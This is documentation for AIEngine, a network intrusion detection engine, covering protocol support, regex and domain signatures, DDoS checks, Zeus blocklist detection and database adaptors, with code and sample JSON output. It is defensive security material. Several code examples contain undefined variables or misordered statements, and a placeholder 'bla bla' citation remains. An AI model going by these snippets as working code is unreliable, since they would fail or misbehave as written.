AIEngine description¶
Table of Contents
- AIEngine description
- Introduction
- Architecture
- Features
- Supported protocols
- IPSet matching
- Regex graphs
- Domain matching
- Ban domain
- Memory management
- DDoS support
- Bloom filter support
- Reject TCP/UDP connections
- External labeling
- Data integration
- ZeroDay exploits signature generation
- Yara signatures
- Network Forensics
- Real time interaction
- Packet engines integration
- Network anomalies
- Use cases and examples
- API
- References
- Terms and conditions
Introduction¶
The aim of this document is to explain and describe the functionality that AI Engine a New Generation Network Intrusion Detection System engine brings.
AIEngine is a next generation programmable network intrusion detection system. Supports x86_64 and Mips architecture over operating systems such as Linux, FreeBSD and MacOS.
Architecture¶
The core of AIEngine is a complex library implemented on C++11/14 standard that process packets on real time. This library uses a external layer of high level programming languages, such as Python, Ruby or even Java, that brings to the engine the flexibility of this type of languages and the speed and performance of C++14 standard.
All the internal architecture is based on objects that could link or not, depending on customer requirements, with other objects for bring a specific functionality. On the other hand, all the memory connections have internal caches that allows to the system to process more than 5.000.000 concurrent TCP connections with no memory problems.
The system supports the most import protocols for different use cases.
- Banking environments. Support for Bitcoin that allows to the customers monitors, controls and detect potential anomalies on their mining infrastructures.
- IoT infrastructures. Support for the most used protocols for the Internet of Things, and also due to the architecture of the system, could be embedded on small devices.
- Data center environments. Support for the most used protocols for data centers for detect anomalies and potential attacks.
- IMS environments. Nowadays, VoIP servers are target of different type of attacks. The proposed systems brings security to SIP servers in order to deal with the new threads of today.
- Industrial infrastructures. Now is critical to have security systems on Industrial infrastructures that could potentially be attacked. The system implements the most common protocols for this type of environments, bringing more intelligence to the upper layers.
The engine is design to support different network environments such as:
- StackLan: Designed for enterprises based on LAN architectures with MPLS or VLans.
- StackMobile: Designed for Mobile operators that needs security on their GN interfaces for secure their base customers.
- StackLanIPv6: Designed for support IPv6 on LAN architectures.
- StackVirtual: Designed for big data centers that support VxLAn on their architecture.
- StackOpenflow: Designed for data centers that supports OpenFlow (experimental).
AIEngine supports the programming of customer requirements code on real time. This brings to the engine the capability of deal with new threads with a reacting time close to zero. This code is written in a function that have one parameter, the TCP/UDP connection object, and we called “callbacks”. These callbacks can be plugged on different objects.
def callback_domain(flow)
print "Malware domain on:%s" % flow
end
d = DomainName.new("Malware domain" ,".some.dns.from.malware.com")
d.callback = method(:callback_domain)
""" Example of callback on HTTP traffic """
def callback_zeus(flow):
h = flow.http_info
if (h):
host = str(h.host_name)
if (host):
print("Suspicious activity detected on flow",str(flow),host)
d = DomainName("Domain from ZeuS botnet",".malware.zeus.com")
d.callback = callback_zeus
""" Example of callback on SMTP traffic for IP reputation """
def callback_smtp_reputation(flow):
h = flow.smtp_info
if (h):
if (access_ip_reputation_service(flow.srcip) == "Bad"):
print("Bad IP accessing email servers ",str(flow))
flow.label = "Bad reputation IP"
i = IPSet()
i.callback = callback_smtp_reputation
Features¶
AIEngine supports the following features on version 1.6
Supported protocols¶
The engine support the following protocols:
- Bitcoin
Bitcoin is a new way of generate and interchange money (more info). The system is able to manage the most common options of the protocol, such us, transactions, getdata, getblocks operations and so on.
- CoAP
The Constrained Application Protocol (CoAP) is a specialized web transfer protocol for use with constrained nodes and constrained networks in the Internet of Things (IoT). It is particularly targeted for small low power sensors, switches, valves and similar components that need to be controlled or supervised remotely, through standard Internet networks.
- DHCP
The most commons of operations of DHCP are available on the engine.
- DNS
The Domain Name Service (DNS) is one of the most used protocols on the Internet. DNS provides a way to know the IP address of any host on the Internet. It is no different than any other directory service. From cover channels to Trojans and other type of malware uses DNS for communicate their services.
- ETHERNET
This is the most important protocol for carry LAN datagrams.....
- GPRS
The system supports G3 and G4 GPRS versions. This is the most common protocol for Mobile operators on the GN interface.
- GRE
Nowadays tunnels are very important on Cloud environments. Most of this systems uses isolation of the network in order to prevent security problems with different virtual systems. GRE is one of the most important tunnels system that allows network isolation. Our system supports this protocol in order to bring security to cloud environments.
- HTTP 1.1
Today HTTP is the most used protocol on the Internet. Also, the majority of the exploit attacks, Trojans, and other type of malware uses this protocol in order to commit different type of ciber-crimes. The proposed system implements a specific HTTP protocol that supports the HTTP 1.1 standard in order to support multiple request on the same network conversation.
- ICMPv4/ICMPv6
The Internet Control Message Protocol (ICMPv4 and ICMPv6) is one of the main protocols of the internet protocol suite. It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached. Denial of service attacks have been doing by using this protocol, so is key to the system to monitor and react under this type of attacks.
- IMAP
The Internet Message Access Protocol (IMAP) is an Internet standard protocol used by e-mail clients to retrieve e-mail messages from a mail server over a TCP/IP connection. Attacks that uses invalid credentials or other type of attacks needs to be addresses.
- IPv4/IPv6
The Internet Protocol (IPv4 and IPv6) is the main communications protocol in the Internet protocol suite for relaying datagrams across network boundaries. This protocol have been involved in many type of attacks, such as fragmentation attacks and so on.
- MPLS
Multi-Protocol Label Switching (MPLS) provides a mechanism for forwarding packets for any network protocol. MPLS flows are connection-oriented and packets are routed along pre-configured Label Switched Paths (LSPs). All the Network stacks of the system supports MPLS in any of their types.
- Modbus
Modbus TCP is a communications protocol for use with its programmable logic controllers (PLCs). Simple and robust, it has since become a de facto standard communication protocol, and it is now a commonly available means of connecting industrial electronic devices. This protocol is very important for Industrial systems that needs to monitor and secure their platforms what uses this type of devices.
- MQTT
MQTT is a publish/subscribe messaging protocol designed for lightweight M2M communications. It was originally developed by IBM and is now an open standard.
- NTP
The Network Time Protocol (NTP) is widely used to synchronize computer clocks in the Internet. The protocol is usually described in terms of a client-server model, but can as easily be used in peer-to-peer relationships where both peers consider the other to be a potential time source. One of the biggest DDoS attacks was made by using this protocol.
- OpenFlow
OpenFlow is an open standard network protocol used to manage traffic between commercial Ethernet switches, routers and wireless access points. Nowadays, data-centers uses this standard to reduce costs and to manage their networks.
- POP
The Post Office Protocol (POP) is an application-layer Internet standard protocol used by local e-mail clients to retrieve e-mail from a remote server over a TCP/IP connection. With this protocol users could manage their e-mail for download, delete, store and so on.
- Quic
The Quic protocol (Quick UDP Internet Connections) is a experimental protocol designed by Google that its goal is to improve perceived performance of connection-oriented web applications that are currently using TCP.
- RTP
The Real-time Transport Protocol (RTP) defines a standard packet format for delivering audio and video over the Internet. It is defined in RFC 1889. RTP is used extensively in communication and entertainment systems that involve streaming media, such as telephony, video applications, television services and web-based push-to-talk features.
- SIP
The Session Initiation Protocol (SIP) is an application-layer control (signaling) protocol for creating, modifying, and terminating sessions with one or more participants. These sessions include Internet telephone calls, multimedia distribution, and multimedia conferences. This protocol is used for establish VoIP sessions.
- SMTP
The Simple Mail Transfer Protocol (SMTP) is a communication protocol for mail servers to transmit email over the Internet. SMTP provides a set of codes that simplify the communication of email messages between email servers. On the other hand, spammers use this protocol to send malware and spam over the Internet.
- SNMP
The Simple Network Management Protocol (SNMP) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on a IP network. SNMP exposes management data in the form of variables on the managed systems, which describe the system configuration. These variables can then be queried (and sometimes set) by managing applications. SNMP have been involved on DDoS reflection attacks on the past, so the system could detect this type of attack and notifies to other systems.
- SSDP
The Simple Service Discovery Protocol (SSDP) is a network protocol based on the IP suite for advertisement and discovery of network services and presence information. The SSDP protocol can discover Plug & Play devices, with uPnP (Universal Plug and Play). SSDP uses unicast and multicast address (239.255.255.250). SSDP is HTTP like protocol and work with NOTIFY and M-SEARCH methods. This protocol is used for the IoT for discover devices basically.
- SSL
SSL stands for Secure Sockets Layer and was originally created by Netscape. SSLv2 and SSLv3 are the 2 versions of this protocol (SSLv1 was never publicly release). After SSLv3, SSL was renamed to TLS. TLS stands for Transport Layer Security and started with TLSv1.0 which is an upgraded version of SSLv3. The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating computer applications.
- TCP
The Transmission Control Protocol (TCP) is a transport layer protocol used by applications that require guaranteed delivery. It is a sliding window protocol that provides handling for both timeouts and retransmissions. On the other hand, TCP establishes a full duplex virtual connection between two endpoints, wherever, each endpoint is defined by an IP address and a TCP port number. The operation of TCP is implemented as a finite state machine. A big varialty of DDoS attacks have been done in the past and recently, incorrect flags, incorrect lengths, offsets and so on.
- UDP
The User Datagram Protocol (UDP) is an alternative communications protocol to TCP used primarily for establishing low-latency and loss tolerating connections between applications on the Internet.
- VLAN
A virtual LAN (VLAN) is any broadcast domain that is partitioned and isolated in a computer network at the data link layer. VLANs are use to provide the network segmentation services traditionally provided only by routers in LAN configurations.
- VXLAN
Virtual Extensible LAN (VXLAN) is a proposed encapsulation protocol for running an overlay network on existing Layer 3 infrastructure. The primary goal of VXLAN is to extend the virtual LAN (VLAN) address space by adding a 24-bit segment ID and increasing the number of available IDs to 16 million.
IPSet matching¶
Most of the engines allows to add sets of IP address in order to monitor or track specific hosts. The engine allows this functionality in a easy way. The following example shows how load the IP address from the ToR network and load onto the engine.
ipset = IPSet()
ipset_mng = IPSetManager()
ipset_mng.add_ip_set(ipset)
""" Take a big list of IP address that belongs to ToR """
req = urllib2.Request("https://www.dan.me.uk/torlist/")
try:
response = urllib2.urlopen(req)
for line in response.readlines():
ip = line.strip()
try:
socket.inet_aton(ip)
except:
continue
ipset.add_ip_address(ip)
except urllib2.URLError as e:
print("Error:",e)
""" Sets the IPSetManager on the stack for TCP traffic """
st.tcp_ip_set_manager = ipset_mng
Regex graphs¶
Nowadays attacks get complex and complex and with Regex Graphs the user is able to generate any complex detection by using graphs. No matter how complex is the attack on the network flow. Complex detection patterns can be done with this functionality.
""" Create a basic regex for match generic SSL traffic """
ssl_sig = Regex("SSL Basic regex","^\x16\x03")
""" Create another regex for match the heartbeat packets of SSL """
sig = Regex("SSL Heartbeat","^.*\x18\x03(\x01|\x02|\x03).*$")
""" Link both regex expressions """
ssl_sig.next_regex = sig
""" Add the main regex to the variable sm of type RegexManager """
sm.add_regex(ssl_sig)
""" Link the sm to the current network stack """
st.tcp_regex_manager = sm
Domain matching¶
The system support domain names matching for the protocols HTTP, DNS, SMTP and SSL. Over HTTP the field Host will be evaluated with a DomainManager that will evaluate if some of the domains matches.
d = DomainManager.new
dom = DomainName.new("Domain from my site",".videos.mysite.com")
d.add_domain_name(dom)
s.set_domain_name_manager(d,"HTTPProtocol")
Also by using DomainNames is possible to generate a sub set of Regex objects. With this functionality the Regex will be more accurate and generate less false positives. For enable this is just as simple as assign a value to a variable.
rm = RegexManager()
dom = DomainName("My specific domain",".customer1.isp.com")
dom.regex_manager = rm
This functionality is perfect for analyze content on HTTP traffic for unknown malware.
On the DNSProtocol the matching of a specific DNS generates on the data output a JSON packet with all the IPS of the DNS response. This brings to the system the capability to provide DNS records with the IP address response in order to generate thread intelligence.
{
"bytes": 297,
"info": {
"dnsdomain": "buzz.dom1.com",
"ips": "34.192.29.124,34.192.29.51,34.192.29.184,34.192.29.121",
"matchs": "My Domain",
"qtype": 1
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "DNSProtocol",
"portdst": 53,
"portsrc": 48208,
"proto": 17
}
Ban domain¶
Nowadays the quantity of traffic on the networks is massive, according to bla bla (some references). With this functionality we can exclude traffic that just consume resources on the engine. Facebook, twitter and this services could be used on this. This functionality is used on protocols like HTTP, DNS, SMTP and SSL.
d = DomainManager
for dom in list_banned_domains:
d.add_domain_name(DomainName("Banned domain",dom))
st.set_domain_name_manager(d,"http")
Memory management¶
Support memory clean caches for refresh stored memory information.
On the other hand, the system provides functionality to increase or decrease specific items of a given protocol. This allows to make specific configurations for a given protocol. For example a dedicated DNS monitor system what could handle 1.000.000 queries.
st = StackLan()
st.tcp_flows = 0
st.udp_flows = 1000000
""" Decrease the memory of the rest of UDP protocols """
st.decrease_allocated_memory(500000,"sip")
st.decrease_allocated_memory(500000,"ssdp")
""" Increase the DNSInfos of the DNS protocol """
st.increase_allocated_memory(1000000,"DNSProtocol")
DDoS support¶
The engine have mechanisms for support denial of service attacks in the majority of the protocols supported. However, for some complex DDoS attacks the engine is capable to accept specific customer requirements for specific attacks. For using this functionality we use the method set_scheduler of the PacketDispatcher. This method with combination of the methods get_counters and get_cache from any of the stacks, allows the user to create complex DDoS attack scenarios for their data centers.
Here is a basic example for detect TCP syn attacks with ruby.
def scheduler_handler_tcp
print "TCP DoS Checker\n"
c = @s.get_counters("TCPProtocol")
# Code the intelligence for detect DDoS based on
# combination flags, bytes, packets and so on.
syns = c["syns"]
synacks = c["synacks"]
if (syns > (synacks * 100))
print "System under a SYN DoS attack\n"
end
end
Another example for detect attacks over NTP on python
def scheduler_handler_ntp():
total_ips = dict()
print("NTP DDoS Checker")
c = st.get_counters("NTPProtocol")
# Count the number different ips of the NTP flows
for flow in st.udp_flow_manager:
if (flow.l7_protocol_name == "NTPProtocol"):
total_ips[flow.src_ip] = 1
if (total_ips.len() == len(fu)):
print("System under a NTP DDoS attack")
All the protocols supports the usage of the stack method get_counters, that allows to extract crucial information from any of the protocols.
""" Get statistics of the BitcoinProtocol """
c = st.get_counters("bitcoin")
print(c)
{'transaction': 1450, 'get blocks': 200, 'network addr': 4, 'packets': 14963,
'inv': 1, 'reject': 0, 'bytes': 1476209, 'ping': 0, 'not found': 0,
'alert': 0, 'headers': 0, 'getaddr': 24, 'version': 0, 'version ack': 34,
'get headers': 12, 'pong': 0, 'getdata': 126, 'mempool': 0, 'block': 0}
Bloom filter support¶
When the customer requirements needs to track a big number of IP addresses, the IPSets are not enough. For this case, the system implements a bloom filter functionality in order to support this requirement. Notice that bloom filters are fault tolerant caches, so false positives and false negatives could happen. However, depending on the number of IP Address we could recommend their usage.
This option needs to be set on compilation time (–enable-bloomfilter) and also have the boost bloomfilter libraries on the system.
Reject TCP/UDP connections¶
Under some attacks the engine is capable of closing UDP and TCP connections in order to reduce the pressure on the servers and also to disturb the origin of the attack. This functionality is only available on StackLans and StackLanIPv6 for the moment.
def some_handler(flow):
""" Some code on the flow """
flow.reject = True
External labeling¶
On some cases, the customer may want to label the communication with a personalized label, depending their needs. The system allows to label any Flow in order to label traffic as customer wants in a easy way.
def callback_for_http(flow):
""" Call to some external service to verify the reputation of a domain """
h = flow.http_info
flow.label = external_domain_service(h.host_name)
Services as IP reputation, Domain reputation, GeoIP services could be used and label depending their return value.
Data integration¶
One of the biggest challenges of the engine is to allows to send the information to any type of database system. Nowadays, systems like MySQL, Redis, Cassandra, Hadoop are on top of any company. By using the functionality of the DatabaseAdaptors, any integration could be possible with a negligible integration time.
For example a database adaptor for write the information on files:
class fileAdaptor (DatabaseAdaptor):
def __init__(self, name):
self.__f = open(name,"w")
def __del__(self):
self.__f.close()
def update(self,key,data):
self.__f.write("Update:[%s] %s\n" % (key,data))
def insert(self,key):
return
def remove(self,key):
return
Another example of a database adaptor integrated with Redis:
class RedisAdaptor < DatabaseAdaptor
attr_reader :ftype
def initialize(ftype)
@ftype = ftype
@conn = Redis.new
end
def insert(key)
@conn.hset(@ftype,key,"{}")
end
def remove(key)
@conn.hdel(@ftype,key)
end
def update(key, data)
@conn.hset(@ftype,key,data)
end
end
Example with integration with ElasticSearch engine:
class elasticSearchAdaptor (pyaiengine.DatabaseAdaptor):
def __init__(self,name):
self.__es = Elasticsearch()
self.__gi = GeoIP.new(GeoIP.GEOIP_MEMORY_CACHE)
self.__rep = ipReputationService()
self.__name = name
def __del__(self):
pass
def update(self,key,data):
""" In this example we enrich the data by using thrid party services """
d = json.loads(data)
d["timestamp"] = datetime.now()
ipdst = key.split(":")[3]
""" Make a geoIP for get the country """
country = self.__gi.country_name_by_addr(ipsrc)
d["country"] = country
""" Make a reputation of the IP """
d["reputation"] = self.__rep.ip_reputation(ipdst)
self.__es.index(index=self.__name, doc_type="networkdata", id=ipdst, body=d)
def insert(self,key):
pass
def remove(self,key):
pass
For support multiple data destination we just need to generate a class and define the next methods:
- insert. This method will be called when a new UDP or TCP connection will be created.
- update. This method is called for update the information of the connection, and also when some important event happens.
- remove. This method is when the connection closes or dies by timeout.
The information given on the update method is encode on JSON, but in some specific cases the system could generate MSGPack.
HTTP data¶
{
"bytes": 335147,
"info": {
"host": "img.weblogservice.com",
"reqs": 2,
"ress": 2
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "HTTPProtocol",
"portdst": 80,
"portsrc": 36628,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(382)F(0)R(0)P(5)Seq(3137345135,1583856454)]"
}
SSL data¶
{
"bytes": 227925,
"info": {
"heartbeat": 0,
"host": "image-store.servicesharecdn.com",
"pdus": 4
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "SSLProtocol",
"portdst": 443,
"portsrc": 51402,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(254)F(0)R(0)P(8)Seq(964705160,2834021200)]"
}
SMTP data¶
{
"bytes": 21083,
"country": "Afganistan",
"reputation": "Suspicious",
"info": {
"from": "gurpartap@patriots.com",
"to": "raj_deol2002in@yahoo.co.uk"
},
"ipdst": "192.168.1.245",
"ipsrc": "192.168.1.1",
"layer7": "SMTPProtocol",
"portdst": 25,
"portsrc": 1470,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]",
"timestamp": "2015-01-07 10:08:45.453259"
}
IMAP data¶
{
"bytes": 10083,
"reputation": "Suspicious",
"info": {
"user": "mark.allen@service.com"
},
"ipdst": "192.168.1.245",
"ipsrc": "192.168.1.1",
"layer7": "IMAPProtocol",
"portdst": 143,
"portsrc": 1470,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]",
"timestamp": "2015-10-07 10:08:45.453259"
}
POP data¶
{
"bytes": 170083,
"info": {
"user": "mark.allen@service.com"
},
"ipdst": "192.168.1.245",
"ipsrc": "192.168.1.1",
"layer7": "POPProtocol",
"portdst": 110,
"portsrc": 21470,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(47)F(2)R(0)P(20)Seq(2126810402,2934727626)]"
}
Bitcoin data¶
{
"bytes": 1664909,
"info": {
"blocks": 2,
"rejects": 0,
"tx": 6
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.142",
"layer7": "BitcoinProtocol",
"portdst": 8333,
"portsrc": 55317,
"proto": 6,
"tcpflags": "Flg[S(1)SA(1)A(1662)F(0)R(0)P(8)Seq(1410785638,4110238515)]"
}
DNS data¶
{
"bytes": 297,
"info": {
"dnsdomain": "www.googleadservices.com",
"ips": "174.12.24.156,174.12.24.157,174.12.24.154,174.12.24.155",
"matchs": "Generic google services",
"qtype": 1
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "DNSProtocol",
"portdst": 53,
"portsrc": 48208,
"proto": 17
}
SIP data¶
{
"bytes":7100,
"info": {
"uri": "sip:192.168.1.200:5060;transport=UDP",
"from": "'David Power'<sip:david_and@192.168.1.200:5060;transport=UDP>",
"to":"'David Power'<sip:david_and@192.168.1.200:5060;transport=UDP>",
"via":"SIP/2.0/UDP 192.168.1.100:5060"
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "SIPProtocol",
"portdst": 5060,
"portsrc": 48208,
"proto": 17
}
SSDP data¶
{
"bytes": 133,
"info": {
"host": "239.255.255.250:1900",
"reqs": 1,
"ress": 0,
"uri": "*"
},
"ipdst": "192.168.1.254",
"ipsrc": "192.168.1.1",
"layer7": "SSDPProtocol",
"portdst": 1900,
"portsrc": 52254,
"proto": 17
}
ZeroDay exploits signature generation¶
Some exploits have the capability of encrypt their content for every instance, this is called Polymorphic/Metamorphism. On this case the generation of the signature depends on the speed of the vendor teams, and sometimes is late. For this case, the engine is capable of auto generate signatures of unknown traffic that will detect and neutralize (if integrate with a firewall) the attack.
This generation could be implemented by using the Python/Ruby API or by using the binary with combination of the network forensics functionality.
Nowadays, unknown attacks on any type of device happens, mobile phones, laptops, IoT devices and so on are perfect target for this attacks. By using the signature generation is possible for the customer to:
- Identify unknown network traffic sources.
- Generate evidences for a forensic analysis or storage.
- Given a pcap file of unknown traffic, identify automatically a valid signature for that traffic.
- Reuse the signature on real time and start to identify this unknown attack.
With this functionality customers don’t depend on updates of third party companies, you owns your data.
Yara signatures¶
The signatures generated by the system are of the customer, their data is important for them, and some signatures could be extremely value for some organizations for identify certain attacks. This signatures generated could be storage on Yara format in order to be compliant with other systems.
rule generated_by_ngnids_engine {
meta:
author="ngnids"
description="Flows generated on port 1986"
date="9/4/2015"
strings:
$a="^\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a"
condition:
$a
}
Network Forensics¶
In some cases there is a need for generate evidences of a receive attack or a specific network event. By using the EvidenceManager is possible to record specific network conversations on files for network forensic analysis.
Real time interaction¶
The system have embedded a Ruby/Python interpreter similar as IPython. So is possible to interact by the user with the system without stooping the packet processing. This brings to the engine capabilities of inject any type of code, ruby or python, on real time to the system without interrupting the service. Also the possibilities that brings to the user higher than traditional engines because there is direct interaction with the user on real time, no need to stops and starts daemon or services is needed.
For activate this functionality is just easy as set the variable enable_shell to true value.
with PacketDispatcher("eth0") as pd:
pd.stack = st
""" Enable the internal shell for interact with the engine """
pd.enable_shell = True
pd.run()
Packet engines integration¶
In some cases the engine needs to be integrated with a firewall or other packet engine. For this case the system allows to inject packets from other engines (Netfilter) to the system. By using this functionality, all the intelligence of the engine could be integrated in a firewall with the next simple steps
def netfilter_callback(packet):
payload = ethernet_header + packet.get_payload()
length = packet.get_payload_len() + 14
""" Use the forwardPacket method from the PacketDispatcher object
in order to forward the packets from netfilter """
pdis.forward_packet(payload,length)
packet.accept()
Network anomalies¶
Some attacks are very dependent of the protocol in use. Incorrect offset of headers, no headers on request, invalid URL formats and so on are present on the network nowadays. The engine supports the following network anomalies attacks.
- IPv4 fragmentation.
- IPv6 fragmentation.
- IPv6 loop extension headers.
- TCP bad flags and incorrect offset headers.
- UDP incorrect offsets.
- DNS incorrect headers and long names.
- SMTP emails.
- IMAP emails.
- POP emails.
- SNMP malformed headers.
- SSL malformed headers.
- HTTP malformed URI and no headers.
- CoAP malformed headers.
- RTP malformed headers.
- MQTT malformed headers.
- Netbios bogus headers.
- DHCP bogus headers.
def my_function_for_http(flow):
print("HTTP Anomaly detected")
""" Some extra code here """
st.set_anomaly_callback(my_function_for_http,"HTTPProtocol")
The example above shows how to generate make specific use of HTTP anomalies and take advantage and create new detection functions.
Use cases and examples¶
This section contains examples and use cases that may help you on yours. If you have a use case that would be interesting for adding feel free.
Zeus malware¶
Nowadays malware is growing fast on the networks, by the following example we could attach the engine to Cloud environment and take advantage of the functionality that the engine provides. Lets see the following example by detecting the Zeus malware:
We define two callbacks, one for the host domain and another for the Uri. The list of host/uris are from the site https://zeustracker.abuse.ch/blocklist.php?download=compromised, but you can provide your own ones.
def callback_uri(flow):
print("Zeus activity detected on flow",str(flow))
def callback_host(flow):
h = flow.http_info
if (h):
host = str(h.host_name)
if (host):
print("Suspicious activity detected on flow",str(flow),host)
We use a external data of malware and load into a DomainNameManager
def loadZeusMalwareData():
data = dict()
# Load the hosts and Urls on memory
# The list have been download from https://zeustracker.abuse.ch/blocklist.php?download=compromised
h_mng = pyaiengine.DomainNameManager()
with open("zeus.dat") as f:
for line in f.readlines():
l = line.strip()
b = l.find("/")
r_host = l[:b]
r_uri = l[b:]
if (not data.has_key(r_host)):
h = pyaiengine.DomainName(r_host,r_host)
s = pyaiengine.HTTPUriSet("Set for %s" % r_host)
h.callback = callback_host
h_mng.add_domain_name(h)
h.http_uri_set = s
s.callback = callback_uri
data[r_host] = (h,s)
data[r_host][1].add_uri(r_uri)
return h_mng
Create a new virtual stack object used on cloud environments on the main.
st = pyaiengine.StackVirtual()
Allocate the maximum number of flows on the UDP stack.
st.tcp_flows = 500000
st.udp_flows = 163840
Load the malware data on the HTTPProtocol and assign them to the stack
st.set_domain_name_manager(loadZeusMalwareData(),"HTTPProtocol")
Open the network device, set the previous stack and run the engine
with pyaiengine.PacketDispatcher("eth0") as pd:
pd.stack = st
pd.run()
Virtual/Cloud malware based detection¶
Nowadays Data centers manage hundreds of virtual machines/networks, On the following example we will configure the system for monitor malware domains on different virtual networks. Lets see how works.
We define a callback function for detection and send and alarm througt syslog
def malware_dns_callback(flow):
d = flow.dns_info
if (d):
syslog.syslog(syslog.LOG_ERR,
"Malware on ip %s domain %d network id %d" % (flow.src_ip,d.domain_name,flow.tag))
We use a external list of malware domains and add to a DomainNameManager class in the same way as the example of the mobile malware. On the other hand, we also create a list of common domains that we dont want to track.
def loadUnwantedDomains():
dm = pyaiengine.DomainNameManager()
dom = pyaiengine.DomainName("Facebook",".facebook.com")
dm.add_domain_name(dom)
dom = pyaiengine.DomainName("Google",".google.com")
dm.add_domain_name(dom)
# Add more common domains
return dm
Create a new virtual stack and connect them.
st = pyaiengine.StackVirtual()
Allocate the maximum number of flows on the UDP stack.
st.udp_flows = 1638400
Load the malware domains and the unwanted domains and assign them to the stack
st.set_domain_name_manager(loadBadDomains(),"DNSProtocol")
st.set_domain_name_manager(loadUnwantedDomains(),"DNSProtocol", False)
Open the network device and run the engine
with pyaiengine.PacketDispatcher("eth0") as pd:
pd.stack = st
pd.run()
Database integration¶
One of the main functions of the engine is the easy integration with databases. Lets see some examples of how works the database interface.
On the first example we will use Redis(http://redis.io/) So we create a class call redisAdaptor that implements the methods update,insert and remove. So for every new flow that the system receives the method insert will be called.
import pyaiengine
import redis
class redisAdaptor(pyaiengine.DatabaseAdaptor):
def __init__(self):
self.__r = None
def connect(self,connection_str):
self.__r = redis.Redis(connection_str)
def update(self,key,data):
self.__r.hset("udpflows",key,data)
def insert(self,key):
self.__r.hset("udpflows",key,"{}")
def remove(self,key):
self.__r.hdel("udpflows",key)
On the other hand you can use Cassandra(https://cassandra.apache.org/) as a second example
import pyaiengine
import pycassa
import json
class cassandraAdaptor(pyaiengine.DatabaseAdaptor):
""" This class inheritance of DatabaseAdaptor that contains
the following methods:
- insert, called on the first insertion of the network flow
- update, called depending on the sample selected.
- remove, called when the flow is destroy.
"""
def __init__(self):
self.__c = None
self.__pool = None
def connect(self,connection_str):
self.__pool = pycassa.ConnectionPool(keyspace='demo', server_list=['127.0.0.1:9160'], prefill=False)
self.__c = pycassa.ColumnFamily(self.__pool, 'flows')
def update(self,key,data):
obj = json.loads(data)
bytes = obj["bytes"]
l7 = obj["layer7"]
l7info = obj.get("httphost",0)
if (l7info == 0):
l7info = obj.get("sslphost",0)
if ( l7info > 0):
d["layer7info"] = l7info
else:
d["layer7info"] = l7info
# Create a dict with all the values of the cassandra table
d = {'bytes':bytes,'layer7':l7}
self.__c.insert(key,d)
def insert(self,key):
self.__c.insert(key,{'bytes':0})
def remove(self,key):
# We dont remove anything on this example
pass
Or use Hadoop with the PyTables(https://pytables.github.io/) interface.
import pyaiengine
import tables
import json
class hadoopFlow(tables.IsDescription):
name = tables.StringCol(50,pos = 1)
bytes = tables.Int32Col(pos = 2)
l7 = tables.StringCol(32,pos = 3)
layer7info = tables.StringCol(64, pos = 4)
class hadoopAdaptor(pyaiengine.DatabaseAdaptor):
def __init__(self):
self.__file = None
self.__group = None
self.__table = None
def connect(self,connection_str):
self.__file = tables.open_file(connection_str, mode="w")
self.__group = self.__file.create_group(self.__file.root, "flows")
self.__table_tcp = self.__file.create_table(self.__group, 'table_tcp', hadoopFlow, "Flow table",
tables.Filters(0))
self.__table_udp = self.__file.create_table(self.__group, 'table_udp', hadoopFlow, "Flow table",
tables.Filters(0))
def __handle_udp(self,key,obj):
query = "name == b'%s'" % key
for f in self.__table_udp.where(query):
f['bytes'] = obj["bytes"]
f['l7'] = obj["layer7"]
l7info = obj.get("dnsdomain",0)
if (l7info > 0):
f['layer7info'] = l7info
f.update()
def update(self,key,data):
try:
obj = json.loads(data)
except:
print "ERROR:",data
return
proto = int(key.split(":")[2])
if (proto == 6):
self.__handle_tcp(key,obj)
else:
self.__handle_udp(key,obj)
def insert(self,key):
proto = int(key.split(":")[2])
if (proto == 6):
t = self.__table_tcp
else:
t = self.__table_udp
f = t.row
f['name'] = key
f['bytes'] = 0
f.append()
t.flush()
def remove(self,key):
# We dont remove anything on this example
pass
We create a new instance of a LAN network on the main
st = pyaiengine.StackLan()
Allocate the maximum number of UDP flows on the system
st.udp_flows = 163840
Create a new instance of the DatabaseAdaptor and plug it to the UDP part of the engine, so only UDP traffic will be process.
# Use your own adaptor (redisAdaptor, cassandraAdaptor, hadoopAdaptor)
db = redisAdaptor()
db.connect("localhost")
st.set_udp_database_adaptor(db,16)
Open the network device, attach the stack and let the engine run
with pyaiengine.PacketDispatcher("eth0") as pd:
pd.stack = st
pd.run()
Now you can check the results on the redis/cassandra/hadoop database.
Injecting code on the engine¶
One of the cool features of the engine is the ability to change the behavior while is executing. The best way to understand this feature is by having a proper example. We load the library and create a StackLan object with some memory requirements.
import pyaiengine
s = pyaiengine.StackLan()
s.tcp_flows = 32768
s.udp_flows = 56384
Just for the example we are going to create 3 DNS rules for handling queries.
d1 = pyaiengine.DomainName("Generic net queries",".net")
d2 = pyaiengine.DomainName("Generic com queries",".com")
d3 = pyaiengine.DomainName("Generic org queries",".org")
dm = pyaiengine.DomainManager()
""" Add the DomainName objects to the manager """
dm.add_domain_name(d1)
dm.add_domain_name(d2)
dm.add_domain_name(d3)
st.set_domain_name_manager(dm,"DNSProtocol")
Now we open a new context of a PacketDispatcher and enable the shell for interacting with the engine.
with pyaiengine.PacketDispatcher("enp0s25") as pd:
pd.stack = st
""" We enable the shell for interact with the engine """
pd.enable_shell = True
pd.run()
If we execute this code we will see the following messages.
[luis@localhost ai]$ python example.py
[09/30/16 21:48:41] Lan network stack ready.
AIEngine 1.6 shell
[09/30/16 21:48:41] Processing packets from device enp0s25
[09/30/16 21:48:41] Stack 'Lan network stack' using 51 MBytes of memory
>>>
